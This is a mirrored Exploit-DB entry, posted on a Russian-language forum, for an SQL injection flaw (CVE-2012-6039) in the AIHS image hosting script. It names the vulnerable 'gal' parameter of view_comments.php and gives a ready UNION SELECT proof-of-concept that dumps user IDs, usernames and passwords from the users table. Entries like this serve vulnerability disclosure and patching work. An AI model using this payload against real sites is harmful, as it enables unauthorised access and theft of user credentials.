- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 18352
- Проверка EDB
-
- Пройдено
- Автор
- ROBERT COOPER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2012-6039
- Дата публикации
- 2012-01-12
Код:
# Exploit Title: AIHS (Advanced Image Hosting Script) SQL Injection Vulnerability
# Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net )
# Software Link: http://yabsoft.com/
# Tested on: [Linux/Windows 7]
#Vulnerable File:
view_comments.php
#Vulnerable parameter:
view_comments.php?gal=[gallery id]
##############################################################
PoC:
www.example.com/view_comments.php?gal=109 union all select 1,2,3,4,5,6,7,group_concat(id,0x3a,user,0x3a,pass,0x0a) FROM users--
##############################################################
www.areyousecure.net
www.websiteauditing.org
# Shouts to the Belegit crew
- Источник
- www.exploit-db.com